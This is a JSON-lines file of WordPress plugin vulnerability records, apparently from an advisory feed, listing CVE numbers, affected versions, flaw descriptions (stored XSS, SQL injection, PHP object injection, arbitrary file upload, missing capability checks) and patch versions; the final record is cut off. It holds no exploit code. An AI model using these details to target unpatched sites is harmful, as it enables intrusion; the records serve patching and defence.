{"CVE_ID":"CVE-2025-8488","slug":"header-footer-elementor","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_hfe_compatibility_option_callback() function in all versions up to, and including, 2.4.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the compatibility option setting.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/2.4.6\\\/admin\\\/class-hfe-addons-actions.php#L494\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/2.4.6\\\/admin\\\/class-hfe-addons-actions.php#L494\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/2.4.7\\\/admin\\\/class-hfe-addons-actions.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/2.4.7\\\/admin\\\/class-hfe-addons-actions.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4b847b5-9deb-41c4-b976-725249e0098e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4b847b5-9deb-41c4-b976-725249e0098e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6214","slug":"ht-mega-for-elementor","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.6 via the purchased_products function. This makes it possible for unauthenticated attackers to extract sensitive data including the previous 7 days of order data including products and customer PII.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54043c6a-48a1-48e8-ba61-a7e8a1773036?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54043c6a-48a1-48e8-ba61-a7e8a1773036?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.3.6\\\/extensions\\\/wc-sales-notification\\\/classes\\\/class.sale_notification.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.3.6\\\/extensions\\\/wc-sales-notification\\\/classes\\\/class.sale_notification.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/ht-mega-for-elementor\\\/trunk\\\/extensions\\\/wc-sales-notification\\\/classes\\\/class.sale_notification.php?old=2654447&old_path=ht-mega-for-elementor%2Ftrunk%2Fextensions%2Fwc-sales-notification%2Fclasses%2Fclass.sale_notification.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/ht-mega-for-elementor\\\/trunk\\\/extensions\\\/wc-sales-notification\\\/classes\\\/class.sale_notification.php?old=2654447&old_path=ht-mega-for-elementor%2Ftrunk%2Fextensions%2Fwc-sales-notification%2Fclasses%2Fclass.sale_notification.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3472","slug":"ocean-extra","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Ocean Extra plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.4.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes when WooCommerce is also installed and activated.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/shortcodes\\\/shortcodes.php#L618\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/shortcodes\\\/shortcodes.php#L618\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74428e76-1946-408f-8adc-24ab4b7e46c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74428e76-1946-408f-8adc-24ab4b7e46c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3458","slug":"ocean-extra","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ocean_gallery_id\u2019 parameter in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The Classic Editor plugin must be installed and activated to exploit the vulnerability.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.6\\\/includes\\\/metabox\\\/gallery-metabox\\\/gallery-metabox.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.6\\\/includes\\\/metabox\\\/gallery-metabox\\\/gallery-metabox.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.6\\\/includes\\\/metabox\\\/gallery-metabox\\\/gallery-metabox.php#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.6\\\/includes\\\/metabox\\\/gallery-metabox\\\/gallery-metabox.php#L162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7595a1f6-6923-4102-8efe-a414adebce65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7595a1f6-6923-4102-8efe-a414adebce65?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3457","slug":"ocean-extra","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'oceanwp_icon' shortcode in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.5\\\/includes\\\/shortcodes\\\/shortcodes.php#L838\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.5\\\/includes\\\/shortcodes\\\/shortcodes.php#L838\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themes.trac.wordpress.org\\\/browser\\\/oceanwp\\\/4.0.6\\\/inc\\\/oceanwp-theme-icons.php#L819\",\"name\":\"https:\\\/\\\/themes.trac.wordpress.org\\\/browser\\\/oceanwp\\\/4.0.6\\\/inc\\\/oceanwp-theme-icons.php#L819\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themes.trac.wordpress.org\\\/browser\\\/oceanwp\\\/4.0.6\\\/inc\\\/oceanwp-theme-icons.php#L866\",\"name\":\"https:\\\/\\\/themes.trac.wordpress.org\\\/browser\\\/oceanwp\\\/4.0.6\\\/inc\\\/oceanwp-theme-icons.php#L866\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/362a01c0-8b97-40dc-8af5-0d904da96576?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/362a01c0-8b97-40dc-8af5-0d904da96576?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10913","slug":"wp-clone-by-wp-academy","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Clone plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.4.6 via deserialization of untrusted input in the 'recursive_unserialized_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16569267-ab52-4b96-86f0-d37c470a3938?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16569267-ab52-4b96-86f0-d37c470a3938?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-clone-by-wp-academy\\\/\\\/tags\\\/2.4.6\\\/lib\\\/icit_srdb_replacer.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-clone-by-wp-academy\\\/\\\/tags\\\/2.4.6\\\/lib\\\/icit_srdb_replacer.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-clone-by-wp-academy\\\/tags\\\/2.4.7\\\/lib\\\/icit_srdb_replacer.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-clone-by-wp-academy\\\/tags\\\/2.4.7\\\/lib\\\/icit_srdb_replacer.php#L24\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6845","slug":"smartsearchwp","versionImpact":"2.4.5","versionEndExcluding":"2.4.6","description":"The Chatbot with ChatGPT WordPress plugin before 2.4.6 does not have proper authorization in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key","recommendation":"Update to version 2.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfaaa843-d89e-42d4-90d9-988293499d26\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfaaa843-d89e-42d4-90d9-988293499d26\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6747","slug":"foogallery-premium","versionEndExcluding":"2.4.6","description":"The Best WordPress Gallery Plugin \u2013 FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom attributes in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping. This makes it possible for contributors and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dce8ac32-cab8-4e05-bf6f-cc348d0c9472?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dce8ac32-cab8-4e05-bf6f-cc348d0c9472?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/fooplugins.com\\\/foogallery-wordpress-gallery-plugin\\\/pricing\\\/\",\"name\":\"https:\\\/\\\/fooplugins.com\\\/foogallery-wordpress-gallery-plugin\\\/pricing\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22634","slug":"easy-booked","versionImpact":"2.4.5","versionEndExcluding":"2.4.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in MD Abu Jubayer Hossain Easy Booked \u2013 Appointment Booking and Scheduling Management System for WordPress allows Cross Site Request Forgery. This issue affects Easy Booked \u2013 Appointment Booking and Scheduling Management System for WordPress: from n\/a through 2.4.5.","recommendation":"Update to version 2.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-booked\\\/vulnerability\\\/wordpress-easy-booked-plugin-2-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-booked\\\/vulnerability\\\/wordpress-easy-booked-plugin-2-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4406","slug":"wpforo","versionImpact":"2.4.5","versionEndExcluding":"2.4.6","description":"The wpForo Forum plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.4.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 2.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.4.5\\\/includes\\\/functions.php#L2139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.4.5\\\/includes\\\/functions.php#L2139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.4.5\\\/includes\\\/functions.php#L2177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.4.5\\\/includes\\\/functions.php#L2177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05b15f33-0f95-458f-8c21-16c0dd98c8bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05b15f33-0f95-458f-8c21-16c0dd98c8bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5674","slug":"newsletter-api","versionImpact":"2.4.5","versionEndExcluding":"2.4.6","description":"The Newsletter - API v1 and v2 addon plugin for WordPress is vulnerable to unauthorized subscribers management due to a PHP type juggling issue on the check_api_key function in all versions up to, and including, 2.4.5. This makes it possible for unauthenticated attackers to list, create or delete newsletter subscribers. This issue affects only sites running a PHP version below 8.0","recommendation":"Update to version 2.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecd9800e-ce0f-45f3-bb66-3690c51d885b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecd9800e-ce0f-45f3-bb66-3690c51d885b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.thenewsletterplugin.com\\\/documentation\\\/developers\\\/newsletter-api-2\\\/\",\"name\":\"https:\\\/\\\/www.thenewsletterplugin.com\\\/documentation\\\/developers\\\/newsletter-api-2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1373","slug":"w4-post-list","versionEndExcluding":"2.4.6","description":"The W4 Post List WordPress plugin before 2.4.6 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa38f3e6-e04c-467c-969b-0f6736087589\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa38f3e6-e04c-467c-969b-0f6736087589\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1371","slug":"w4-post-list","versionEndExcluding":"2.4.6","description":"The W4 Post List WordPress plugin before 2.4.6 does not ensure that password protected posts can be accessed before displaying their content, which could allow any authenticated user to access them","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad5c167e-77f7-453c-9443-df6e07705d89\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad5c167e-77f7-453c-9443-df6e07705d89\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0374","slug":"w4-post-list","versionEndExcluding":"2.4.6","description":"The W4 Post List WordPress plugin before 2.4.6 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb10f2e-73b8-444c-90b2-5c84cdf6de5c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb10f2e-73b8-444c-90b2-5c84cdf6de5c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6846","slug":"smartsearchwp","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not validate access on some REST routes, allowing for an unauthenticated user to purge error and chat logs","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d48fdab3-669c-4870-a2f9-6c39a7c25fd8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d48fdab3-669c-4870-a2f9-6c39a7c25fd8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0072","slug":"wc-vendors","versionEndExcluding":"2.4.5","description":"The WC Vendors Marketplace WordPress plugin before 2.4.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb2b876f-7216-4f31-9d1f-a45405c545ce\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb2b876f-7216-4f31-9d1f-a45405c545ce\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13651","slug":"unusedcss","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The RapidLoad \u2013 Optimize Web Vitals Automatically plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_deactivate() function in all versions up to, and including, 2.4.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset some of the plugin's settings.","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232560%40unusedcss&new=3232560%40unusedcss&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232560%40unusedcss&new=3232560%40unusedcss&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87f9f052-2963-4548-9ff8-91dc2b4ecb43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87f9f052-2963-4548-9ff8-91dc2b4ecb43?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4047","slug":"broken-link-checker","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The Broken Link Checker plugin for WordPress is vulnerable to unauthorized data access due to a missing capability check on the ajax_full_status and ajax_dashboard_status functions in all versions up to, and including, 2.4.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view the plugin's status.","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker\\\/tags\\\/2.4.2\\\/legacy\\\/core\\\/core.php#L3272\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker\\\/tags\\\/2.4.2\\\/legacy\\\/core\\\/core.php#L3272\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294992\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294992\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33ac910c-9531-45ea-84cf-1d379233f7d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33ac910c-9531-45ea-84cf-1d379233f7d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6843","slug":"smartsearchwp","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not sanitise and escape user inputs, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against admins","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a5cb440-065a-445a-9a09-55bd5f782e85\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a5cb440-065a-445a-9a09-55bd5f782e85\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6847","slug":"smartsearchwp","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users when submitting messages to the chatbot.","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baa860bb-3b7d-438a-ad54-92bf8e21e851\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baa860bb-3b7d-438a-ad54-92bf8e21e851\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1937","slug":"brizy","versionImpact":"2.4.44","versionEndExcluding":"2.4.45","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_item' function in all versions up to, and including, 2.4.44. This makes it possible for authenticated attackers, with contributor access and above, to modify the content of arbitrary published posts, which includes the ability to insert malicious JavaScript.","recommendation":"Update to version 2.4.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb5f73c3-f40b-45d5-9947-c1a514d230f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb5f73c3-f40b-45d5-9947-c1a514d230f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112878\\\/brizy\\\/trunk\\\/editor\\\/api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112878\\\/brizy\\\/trunk\\\/editor\\\/api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3242","slug":"brizy","versionImpact":"2.4.44","versionEndExcluding":"2.4.45","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file extension validation in the validateImageContent function called via storeImages in all versions up to, and including, 2.4.43. This makes it possible for authenticated attackers, with contributor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Version 2.4.44 prevents the upload of files ending in .sh and .php. Version 2.4.45 fully patches the issue.","recommendation":"Update to version 2.4.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a414de0a-ae44-4955-bd25-ec6ad7860835?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a414de0a-ae44-4955-bd25-ec6ad7860835?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L547\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L547\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086506\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086506\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112878\\\/brizy\\\/trunk?contextall=1&old=3086506&old_path=%2Fbrizy%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112878\\\/brizy\\\/trunk?contextall=1&old=3086506&old_path=%2Fbrizy%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1164","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's contact form widget error message and redirect URL in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping on user supplied error messages. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9746cd9f-afb2-41b2-9e31-7c77222d9cfd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9746cd9f-afb2-41b2-9e31-7c77222d9cfd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3667","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' field of multiple widgets in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.44, or a newer patched 